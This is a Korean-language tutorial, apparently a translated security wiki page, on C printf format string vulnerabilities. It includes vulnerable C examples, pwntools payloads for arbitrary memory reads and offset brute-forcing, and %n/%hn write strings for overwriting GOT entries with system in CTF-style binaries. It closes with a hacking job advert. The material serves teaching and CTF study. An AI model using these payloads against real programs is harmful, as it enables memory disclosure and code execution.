C **printf**는 문자열을 출력하는 데 사용할 수 있는 함수입니다. 이 함수가 기대하는 첫 번째 매개변수는 형식 지정자가 포함된 원시 텍스트입니다. 다음 매개변수는 원시 텍스트의 형식 지정자를 대체할 값입니다.
다른 취약한 함수로는 **sprintf()**와 **fprintf()**가 있습니다.
취약점은 공격자 텍스트가 이 함수의 첫 번째 인수로 사용될 때 발생합니다. 공격자는 printf 형식 문자열 기능을 악용하여 **어떤 주소(읽기/쓰기 가능한)**에서 모든 데이터를 읽고 쓸 수 있는특별한 입력을 만들 수 있습니다. 이렇게 해서 임의 코드를 실행할 수 있습니다.
Formatters:
%08x —>8hexbytes%d —>Entire%u —>Unsigned%s —>String%p —>Pointer%n —>Numberofwrittenbytes%hn —>Occupies2bytesinsteadof4<n>$X —> Direct access, Example: ("%3$d",var1,var2,var3) —> Access to var3
예시:
취약한 예시:
char buffer[30];gets(buffer); // Dangerous: takes user input without restrictions.printf(buffer); // If buffer contains "%x", it reads from the stack.
일반 사용:
int value =1205;printf("%x%x%x", value, value, value); // Outputs: 4b5 4b5 4b5
인수가 누락된 경우:
printf("%x%x%x", value); // Unexpected output: reads random values from the stack.
fprintf 취약점:
#include<stdio.h>intmain(int argc,char*argv[]) {char*user_input;user_input = argv[1];FILE *output_file =fopen("output.txt","w");fprintf(output_file, user_input); // The user input can include formatters!fclose(output_file);return0;}
포인터 접근
형식 **%<n>$x**에서 n은 숫자로, printf에 스택에서 n번째 매개변수를 선택하도록 지시합니다. 따라서 printf를 사용하여 스택에서 4번째 매개변수를 읽고 싶다면 다음과 같이 할 수 있습니다:
printf("%x%x%x%x")
그리고 첫 번째부터 네 번째 매개변수까지 읽을 수 있습니다.
또는 다음과 같이 할 수 있습니다:
printf("%4$x")
and read directly the forth.
공격자가 printf매개변수를 제어한다는 것은 그의 입력이 printf가 호출될 때 스택에 존재한다는 것을 의미하며, 이는 그가 스택에 특정 메모리 주소를 쓸 수 있다는 것을 의미합니다.
이 입력을 제어하는 공격자는 스택에 임의의 주소를 추가하고 printf가 이를 접근하게 만들 수 있습니다. 다음 섹션에서는 이 동작을 사용하는 방법이 설명될 것입니다.
임의 읽기
형식 지정자 **%n$s**를 사용하여 **printf**가 n 위치에 있는 주소를 가져오고 문자열처럼 출력할 수 있습니다(0x00이 발견될 때까지 출력). 따라서 바이너리의 기본 주소가 **0x8048000**이고, 사용자 입력이 스택의 4번째 위치에서 시작된다는 것을 알고 있다면, 다음과 같이 바이너리의 시작 부분을 출력할 수 있습니다:
from pwn import*p =process('./bin')payload =b'%6$s'#4th parampayload +=b'xxxx'#5th param (needed to fill 8bytes with the initial input)payload +=p32(0x8048000)#6th paramp.sendline(payload)log.info(p.clean())# b'\x7fELF\x01\x01\x01||||'
입력의 시작 부분에 0x8048000 주소를 넣을 수 없다는 점에 유의하세요. 문자열은 해당 주소의 끝에서 0x00으로 잘리기 때문입니다.
오프셋 찾기
입력의 오프셋을 찾기 위해 4 또는 8 바이트(0x41414141)를 보낸 다음 **%1$x**를 추가하고 값을 증가시켜A's를 검색할 수 있습니다.
브루트 포스 printf 오프셋
```python # Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
from pwn import *
Iterate over a range of integers
for i in range(10):
Construct a payload that includes the current integer as offset
payload = f"AAAA%{i}$x".encode()
Start a new process of the "chall" binary
p = process("./chall")
Send the payload to the process
p.sendline(payload)
Read and store the output of the process
output = p.clean()
Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output
if b"41414141" in output:
If the string is found, log the success message and break out of the loop
log.success(f"User input is at offset : {i}") break
Close the process
p.close()
</details>
### 얼마나 유용한가
임의 읽기는 다음과 같은 용도로 유용할 수 있습니다:
* **메모리에서** **바이너리**를 **덤프**하기
* **민감한** **정보**가 저장된 메모리의 특정 부분에 **접근하기** (예: 이 [**CTF 챌린지**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value)와 같이)
## **임의 쓰기**
포맷터 **`%<num>$n`**은 스택의 \<num> 매개변수에 있는 **지정된 주소**에 **쓰기 바이트 수**를 **기록**합니다. 공격자가 printf를 사용하여 원하는 만큼의 문자를 쓸 수 있다면, 그는 **`%<num>$n`**을 사용하여 임의의 주소에 임의의 숫자를 쓸 수 있게 됩니다.
다행히도, 숫자 9999를 쓰기 위해 입력에 9999개의 "A"를 추가할 필요는 없으며, 대신 포맷터 **`%.<num-write>%<num>$n`**을 사용하여 **`<num-write>`** 숫자를 **`num` 위치가 가리키는 주소**에 쓸 수 있습니다.
```bash
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500
그러나 일반적으로 0x08049724와 같은 주소를 쓰기 위해 (한 번에 쓰기에는 엄청난 숫자임) **$hn**이 $n 대신 사용됩니다. 이는 2바이트만 쓸 수 있게 해줍니다. 따라서 이 작업은 주소의 가장 높은 2바이트와 가장 낮은 2바이트에 대해 각각 두 번 수행됩니다.
따라서 이 취약점은 임의의 주소에 무엇이든 쓸 수 있게 해줍니다.
이 예제에서 목표는 나중에 호출될GOT 테이블의 함수의 주소를 덮어쓰는 것입니다. 이는 다른 임의 쓰기를 악용하여 exec 기술을 사용할 수 있습니다:
우리는 사용자로부터 인수를 받는함수를 덮어쓰고, 이를 system함수를 가리키게 할 것입니다.
언급했듯이 주소를 쓰기 위해서는 일반적으로 2단계가 필요합니다: 먼저 주소의 2바이트를 쓰고, 그 다음에 나머지 2바이트를 씁니다. 이를 위해 **$hn**이 사용됩니다.
HOB는 주소의 2개의 높은 바이트를 호출합니다.
LOB는 주소의 2개의 낮은 바이트를 호출합니다.
그런 다음, 포맷 문자열의 작동 방식 때문에 먼저 더 작은 [HOB, LOB]를 쓰고 그 다음에 다른 것을 써야 합니다.
32 비트, relro, no canary, nx, no pie, .fini_array 내의 main에 있는 주소를 쓰기 위한 형식 문자열 (흐름이 한 번 더 루프됨) 및 strlen을 가리키는 GOT 테이블의 system 주소를 쓰기. 흐름이 main으로 돌아가면, strlen이 사용자 입력과 함께 실행되고 system을 가리키면, 전달된 명령이 실행됩니다.
해킹 경력에 관심이 있고 해킹할 수 없는 것을 해킹하고 싶다면 - 우리는 인재를 모집합니다! (유창한 폴란드어 필기 및 구사 필수).